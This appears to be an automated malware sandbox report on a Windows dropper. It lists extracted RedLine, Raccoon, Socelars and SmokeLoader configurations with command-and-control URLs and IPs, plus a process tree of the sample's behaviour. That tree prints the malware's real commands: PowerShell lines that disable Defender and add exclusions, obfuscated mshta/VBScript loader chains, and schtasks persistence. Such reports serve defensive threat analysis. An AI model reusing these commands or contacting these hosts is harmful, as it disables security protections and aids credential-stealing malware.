Overview
overview
10Static
static
01a53007f9...68.exe
windows10_x64
10022e3c30a1...66.exe
windows10_x64
1002ca2b5bb7...35.exe
windows10_x64
100d69cafe70...cd.exe
windows10_x64
100df647f0a2...bc.exe
windows10_x64
101df367eead...2c.exe
windows10_x64
101e083736ae...33.exe
windows10_x64
101e662d9025...7d.exe
windows10_x64
102010009ff5...59.exe
windows10_x64
10243379992d...93.exe
windows10_x64
102d63a14e4a...1a.exe
windows10_x64
1030e6815ae0...51.exe
windows10_x64
1364d3b0e94...fa.exe
windows10_x64
103a4e2dfbd7...00.exe
windows10_x64
104a4a606501...75.exe
windows10_x64
104d89b00768...c0.exe
windows10_x64
105524bfd826...5f.exe
windows10_x64
10582bd655f4...9b.exe
windows10_x64
10588b74dc8e...70.exe
windows10_x64
10609accbb14...2b.exe
windows10_x64
10620a9a3efa...11.exe
windows10_x64
10623bb62b2b...7c.exe
windows10_x64
10642c69b710...bc.exe
windows10_x64
106e18165c4a...34.exe
windows10_x64
1078a82aa6d4...cd.exe
windows10_x64
8809ed9e2d0...41.exe
windows10_x64
1082bf2273f6...2f.exe
windows10_x64
109bd142ecfe...06.exe
windows10_x64
109c4880a98c...82.exe
windows10_x64
109d608ed375...11.exe
windows10_x64
109ed5bbddf1...6e.exe
windows10_x64
10a1dad4a83d...c4.exe
windows10_x64
10Analysis
-
max time kernel
65s -
max time network
346s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
10-11-2021 14:52
Static task
static1
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral3
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10-en-20211014
Behavioral task
behavioral5
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10-en-20211104
Behavioral task
behavioral8
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
30e6815ae008a8638c5b30460098904121e0b98c7e87784d950f1dc55aafec51.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
Resource
win10-en-20211104
Behavioral task
behavioral14
Sample
3a4e2dfbd7943c7200d7c5ea70c2b0117408d3c1ac3cac7b757d8e05dcc9ff00.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
Resource
win10-en-20211104
Behavioral task
behavioral16
Sample
4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
5524bfd8269c656293e16b8da80bd43983f457f261f052e166d90a079517115f.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
582bd655f491fe76a95b9c8900a3051d379dcbb86036f273b2a7bc6cdd928e9b.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
588b74dc8e2473c34be3e958cb4f63e6466feb0be21e7b0a6418c1c8112ee370.exe
Resource
win10-en-20211014
Behavioral task
behavioral20
Sample
609accbb14b3fb81d04e3142447678c4a163ec4fa6e33256e00f723e64b0852b.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
620a9a3efa423f182b5126bec022a1871d7051d08065495ba7bed12e18668111.exe
Resource
win10-en-20211014
Behavioral task
behavioral22
Sample
623bb62b2bdec1c2b272fbeb0da95904b91f20f95a27dc8a59d0ca4c1010ef7c.exe
Resource
win10-en-20211104
Behavioral task
behavioral23
Sample
642c69b7109f087d01166ed237a4fd4611a2209a11e23a8dc2f2ba5aec3118bc.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
6e18165c4a3685b247b326103b7a12266f7d01a8831aa97e710449273263dc34.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
78a82aa6d47c01237be6b269d2bda88a9ca0b1e6eecc29ba631e18fbbd18e5cd.exe
Resource
win10-en-20211104
Behavioral task
behavioral26
Sample
809ed9e2d09751dad774b865881411b32bd24ad1626e331c0760b507c20eb741.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
82bf2273f62e1bb50f3189fcf8bcf367a264e6942848209c325b3dd5da2cd62f.exe
Resource
win10-en-20211104
Behavioral task
behavioral28
Sample
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806.exe
Resource
win10-en-20211104
Behavioral task
behavioral29
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral30
Sample
9d608ed375a27a573add396e92f4f8e831cb71d344fa21f14b04c42788946511.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
9ed5bbddf1be7ad2f19ae45eff5839f0e7a7f435f9fd583a49c2ff7a5e860d6e.exe
Resource
win10-en-20211014
Behavioral task
behavioral32
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211104
General
-
Target
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
-
Size
4.4MB
-
MD5
bfc2137972c74edea0f9791b94486e9b
-
SHA1
fd72e52406ce3f2ae5cfdb5dd8c7243f3ce31eb3
-
SHA256
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4
-
SHA512
9fcd3756f9888e2000b94caf0d803087497b87428c0bd641901d2e416411bc698d9ca3a7a00d3cd711b681f3c8b8921f2a478f0ec1f975bc36fde5cf16741e75
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
media18
91.121.67.60:2151
Extracted
redline
Chris
194.104.136.5:46013
Extracted
raccoon
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4908 4752 rundll32.exe 126 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral32/memory/4344-285-0x000000000041B23E-mapping.dmp family_redline behavioral32/memory/4344-283-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral32/memory/4324-284-0x000000000041B242-mapping.dmp family_redline behavioral32/memory/4324-281-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral32/memory/4852-327-0x000000000041B23E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral32/files/0x000400000001abfb-180.dat family_socelars behavioral32/files/0x000400000001abfb-224.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
resource yara_rule behavioral32/files/0x000400000001abeb-127.dat aspack_v212_v242 behavioral32/files/0x000500000001abed-133.dat aspack_v212_v242 behavioral32/files/0x000500000001abed-132.dat aspack_v212_v242 behavioral32/files/0x000500000001aba6-129.dat aspack_v212_v242 behavioral32/files/0x000500000001aba6-128.dat aspack_v212_v242 behavioral32/files/0x000400000001abeb-126.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 3668 setup_installer.exe 3532 setup_install.exe 2084 Tue2082ea84bd.exe 3352 Tue201d50e7015.exe 2208 Tue202dc71d1d41.exe 3232 Tue207c76c7f37.exe 4020 Tue20ea834764a6.exe 3056 Tue2082eedf21.exe 3540 Tue2076b72c2666aa9c.exe 3424 Tue20abd30733a17.exe 3248 Tue20d8f1968de62f282.exe 3552 Tue203dd57461.exe 1536 Tue20c79bfdadc.exe 3928 Tue200ab8d408d.exe 768 Tue205724605816e79.exe 1532 Tue20adee3c26d.exe 3808 Tue2095db5b6bd7.exe 1100 qLIYm1_tmF9dmQfwef0qKoHu.exe 2400 Tue201d50e7015.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 6 IoCs
pid Process 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 1100 qLIYm1_tmF9dmQfwef0qKoHu.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 ipinfo.io 428 ipinfo.io 429 ipinfo.io 353 ipinfo.io 52 ipinfo.io 55 ip-api.com 92 ipinfo.io 223 ipinfo.io 225 ipinfo.io 352 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
pid pid_target Process procid_target 1568 3532 WerFault.exe 70 4296 3248 WerFault.exe 87 3944 4640 WerFault.exe 152 2200 4520 WerFault.exe 155 2072 4640 WerFault.exe 152 5440 4640 WerFault.exe 152 6028 4640 WerFault.exe 152 5400 5336 WerFault.exe 181 5600 5336 WerFault.exe 181 6448 5336 WerFault.exe 181 6916 5336 WerFault.exe 181 6848 4640 WerFault.exe 152 6716 4640 WerFault.exe 152 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5784 schtasks.exe 988 schtasks.exe 6452 schtasks.exe 6504 schtasks.exe 6384 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4320 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 6728 taskkill.exe 6912 taskkill.exe 2328 taskkill.exe 4920 taskkill.exe 4952 taskkill.exe 5324 taskkill.exe 5208 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2516 powershell.exe 2516 powershell.exe 2328 powershell.exe 2328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeDebugPrivilege 3424 Tue20abd30733a17.exe Token: SeCreateTokenPrivilege 3808 Tue2095db5b6bd7.exe Token: SeAssignPrimaryTokenPrivilege 3808 Tue2095db5b6bd7.exe Token: SeLockMemoryPrivilege 3808 Tue2095db5b6bd7.exe Token: SeIncreaseQuotaPrivilege 3808 Tue2095db5b6bd7.exe Token: SeMachineAccountPrivilege 3808 Tue2095db5b6bd7.exe Token: SeTcbPrivilege 3808 Tue2095db5b6bd7.exe Token: SeSecurityPrivilege 3808 Tue2095db5b6bd7.exe Token: SeTakeOwnershipPrivilege 3808 Tue2095db5b6bd7.exe Token: SeLoadDriverPrivilege 3808 Tue2095db5b6bd7.exe Token: SeSystemProfilePrivilege 3808 Tue2095db5b6bd7.exe Token: SeSystemtimePrivilege 3808 Tue2095db5b6bd7.exe Token: SeProfSingleProcessPrivilege 3808 Tue2095db5b6bd7.exe Token: SeIncBasePriorityPrivilege 3808 Tue2095db5b6bd7.exe Token: SeCreatePagefilePrivilege 3808 Tue2095db5b6bd7.exe Token: SeCreatePermanentPrivilege 3808 Tue2095db5b6bd7.exe Token: SeBackupPrivilege 3808 Tue2095db5b6bd7.exe Token: SeRestorePrivilege 3808 Tue2095db5b6bd7.exe Token: SeShutdownPrivilege 3808 Tue2095db5b6bd7.exe Token: SeDebugPrivilege 3808 Tue2095db5b6bd7.exe Token: SeAuditPrivilege 3808 Tue2095db5b6bd7.exe Token: SeSystemEnvironmentPrivilege 3808 Tue2095db5b6bd7.exe Token: SeChangeNotifyPrivilege 3808 Tue2095db5b6bd7.exe Token: SeRemoteShutdownPrivilege 3808 Tue2095db5b6bd7.exe Token: SeUndockPrivilege 3808 Tue2095db5b6bd7.exe Token: SeSyncAgentPrivilege 3808 Tue2095db5b6bd7.exe Token: SeEnableDelegationPrivilege 3808 Tue2095db5b6bd7.exe Token: SeManageVolumePrivilege 3808 Tue2095db5b6bd7.exe Token: SeImpersonatePrivilege 3808 Tue2095db5b6bd7.exe Token: SeCreateGlobalPrivilege 3808 Tue2095db5b6bd7.exe Token: 31 3808 Tue2095db5b6bd7.exe Token: 32 3808 Tue2095db5b6bd7.exe Token: 33 3808 Tue2095db5b6bd7.exe Token: 34 3808 Tue2095db5b6bd7.exe Token: 35 3808 Tue2095db5b6bd7.exe Token: SeRestorePrivilege 1568 WerFault.exe Token: SeBackupPrivilege 1568 WerFault.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 3552 Tue203dd57461.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2920 wrote to memory of 3668 2920 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 69 PID 2920 wrote to memory of 3668 2920 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 69 PID 2920 wrote to memory of 3668 2920 a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe 69 PID 3668 wrote to memory of 3532 3668 setup_installer.exe 70 PID 3668 wrote to memory of 3532 3668 setup_installer.exe 70 PID 3668 wrote to memory of 3532 3668 setup_installer.exe 70 PID 3532 wrote to memory of 352 3532 setup_install.exe 73 PID 3532 wrote to memory of 352 3532 setup_install.exe 73 PID 3532 wrote to memory of 352 3532 setup_install.exe 73 PID 3532 wrote to memory of 2624 3532 setup_install.exe 74 PID 3532 wrote to memory of 2624 3532 setup_install.exe 74 PID 3532 wrote to memory of 2624 3532 setup_install.exe 74 PID 3532 wrote to memory of 1720 3532 setup_install.exe 75 PID 3532 wrote to memory of 1720 3532 setup_install.exe 75 PID 3532 wrote to memory of 1720 3532 setup_install.exe 75 PID 3532 wrote to memory of 4048 3532 setup_install.exe 76 PID 3532 wrote to memory of 4048 3532 setup_install.exe 76 PID 3532 wrote to memory of 4048 3532 setup_install.exe 76 PID 3532 wrote to memory of 3052 3532 setup_install.exe 83 PID 3532 wrote to memory of 3052 3532 setup_install.exe 83 PID 3532 wrote to memory of 3052 3532 setup_install.exe 83 PID 3532 wrote to memory of 1828 3532 setup_install.exe 82 PID 3532 wrote to memory of 1828 3532 setup_install.exe 82 PID 3532 wrote to memory of 1828 3532 setup_install.exe 82 PID 3532 wrote to memory of 812 3532 setup_install.exe 77 PID 3532 wrote to memory of 812 3532 setup_install.exe 77 PID 3532 wrote to memory of 812 3532 setup_install.exe 77 PID 3532 wrote to memory of 1380 3532 setup_install.exe 78 PID 3532 wrote to memory of 1380 3532 setup_install.exe 78 PID 3532 wrote to memory of 1380 3532 setup_install.exe 78 PID 3532 wrote to memory of 2236 3532 setup_install.exe 81 PID 3532 wrote to memory of 2236 3532 setup_install.exe 81 PID 3532 wrote to memory of 2236 3532 setup_install.exe 81 PID 3532 wrote to memory of 2764 3532 setup_install.exe 80 PID 3532 wrote to memory of 2764 3532 setup_install.exe 80 PID 3532 wrote to memory of 2764 3532 setup_install.exe 80 PID 3532 wrote to memory of 1148 3532 setup_install.exe 79 PID 3532 wrote to memory of 1148 3532 setup_install.exe 79 PID 3532 wrote to memory of 1148 3532 setup_install.exe 79 PID 3532 wrote to memory of 3956 3532 setup_install.exe 84 PID 3532 wrote to memory of 3956 3532 setup_install.exe 84 PID 3532 wrote to memory of 3956 3532 setup_install.exe 84 PID 3532 wrote to memory of 2324 3532 setup_install.exe 94 PID 3532 wrote to memory of 2324 3532 setup_install.exe 94 PID 3532 wrote to memory of 2324 3532 setup_install.exe 94 PID 3532 wrote to memory of 1408 3532 setup_install.exe 93 PID 3532 wrote to memory of 1408 3532 setup_install.exe 93 PID 3532 wrote to memory of 1408 3532 setup_install.exe 93 PID 3532 wrote to memory of 1736 3532 setup_install.exe 92 PID 3532 wrote to memory of 1736 3532 setup_install.exe 92 PID 3532 wrote to memory of 1736 3532 setup_install.exe 92 PID 3532 wrote to memory of 1392 3532 setup_install.exe 85 PID 3532 wrote to memory of 1392 3532 setup_install.exe 85 PID 3532 wrote to memory of 1392 3532 setup_install.exe 85 PID 3532 wrote to memory of 2028 3532 setup_install.exe 91 PID 3532 wrote to memory of 2028 3532 setup_install.exe 91 PID 3532 wrote to memory of 2028 3532 setup_install.exe 91 PID 1736 wrote to memory of 2084 1736 cmd.exe 90 PID 1736 wrote to memory of 2084 1736 cmd.exe 90 PID 1736 wrote to memory of 2084 1736 cmd.exe 90 PID 4048 wrote to memory of 3352 4048 cmd.exe 89 PID 4048 wrote to memory of 3352 4048 cmd.exe 89 PID 4048 wrote to memory of 3352 4048 cmd.exe 89 PID 1148 wrote to memory of 2208 1148 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:352
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:2624
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue200ab8d408d.exe4⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue200ab8d408d.exeTue200ab8d408d.exe5⤵
- Executes dropped EXE
PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue201d50e7015.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue201d50e7015.exeTue201d50e7015.exe5⤵
- Executes dropped EXE
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\is-VV71I.tmp\Tue201d50e7015.tmp"C:\Users\Admin\AppData\Local\Temp\is-VV71I.tmp\Tue201d50e7015.tmp" /SL5="$40110,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue201d50e7015.exe"6⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue201d50e7015.exe"C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue201d50e7015.exe" /SILENT7⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\is-DI85S.tmp\Tue201d50e7015.tmp"C:\Users\Admin\AppData\Local\Temp\is-DI85S.tmp\Tue201d50e7015.tmp" /SL5="$201DC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue201d50e7015.exe" /SILENT8⤵PID:2364
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20adee3c26d.exe4⤵PID:812
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20adee3c26d.exeTue20adee3c26d.exe5⤵
- Executes dropped EXE
PID:1532 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20adee3c26d.exe"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20adee3c26d.exe"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )6⤵PID:1436
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20adee3c26d.exe" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20adee3c26d.exe") do taskkill /IM "%~nXY" -f7⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\_4SO.EXE..\_4SO.Exe /PZOIMJIYi~u3pALhs8⤵PID:4588
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )9⤵PID:4712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE") do taskkill /IM "%~nXY" -f10⤵PID:4864
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT( "WSCRIPt.SHELL" ).RUn( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 ,tRue ) )9⤵PID:4884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D&COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un+3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *10⤵PID:3976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵PID:4868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"11⤵PID:5064
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\WOYVBnm.911⤵PID:4564
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Tue20adee3c26d.exe" -f8⤵
- Kills process with taskkill
PID:4920
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20ea834764a6.exe4⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue20ea834764a6.exeTue20ea834764a6.exe5⤵
- Executes dropped EXE
PID:4020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue202dc71d1d41.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\7zS45E6E996\Tue202dc71d1d41.exeTue202dc71d1d41.exe5⤵
- Executes dropped EXE
PID:2208 -
C:\Users\Admin\Pictures\Adobe Films\txVp2sGQkSffyQlIehUISK1r.exe"C:\Users\Admin\Pictures\Adobe Films\txVp2sGQkSffyQlIehUISK1r.exe"6⤵PID:3536
-
-
C:\Users\Admin\Pictures\Adobe Films\J55bEhlVuMIf3Rm4EMlVJIAl.exe"C:\Users\Admin\Pictures\Adobe Films\J55bEhlVuMIf3Rm4EMlVJIAl.exe"6⤵PID:5356
-
-
C:\Users\Admin\Pictures\Adobe Films\QVMRfac2kTUXMzeplkZnC2Io.exe"C:\Users\Admin\Pictures\Adobe Films\QVMRfac2kTUXMzeplkZnC2Io.exe"6⤵PID:5348
-
C:\Users\Admin\Pictures\Adobe Films\QVMRfac2kTUXMzeplkZnC2Io.exe"C:\Users\Admin\Pictures\Adobe Films\QVMRfac2kTUXMzeplkZnC2Io.exe"7⤵PID:5580
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uhIX0W5YJbxC4ItlL3OS3Ezd.exe"C:\Users\Admin\Pictures\Adobe Films\uhIX0W5YJbxC4ItlL3OS3Ezd.exe"6⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 6567⤵
- Program crash
PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 6727⤵
- Program crash
PID:5600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 5927⤵
- Program crash
PID:6448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 6527⤵
- Program crash
PID:6916
-
-
-
C:\Users\Admin\Pictures\Adobe Films\KDzjNfH3rkuwljd5iwgjBsDE.exe"C:\Users\Admin\Pictures\Adobe Films\KDzjNfH3rkuwljd5iwgjBsDE.exe"6⤵PID:5384
-
-
C:\Users\Admin\Pictures\Adobe Films\Dcb6QVhtZZEaV8a2Ef6VZoAK.exe"C:\Users\Admin\Pictures\Adobe Films\Dcb6QVhtZZEaV8a2Ef6VZoAK.exe"6⤵PID:5688
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6452
-
-
C:\Users\Admin\Documents\N1_WTxWUhfdJSo6rmFa9ZpBO.exe"C:\Users\Admin\Documents\N1_WTxWUhfdJSo6rmFa9ZpBO.exe"7⤵PID:4320
-
C:\Users\Admin\Pictures\Adobe Films\bNk2qU7GrYN0cAN2uhGORomt.exe"C:\Users\Admin\Pictures\Adobe Films\bNk2qU7GrYN0cAN2uhGORomt.exe"8⤵PID:4168
-
-
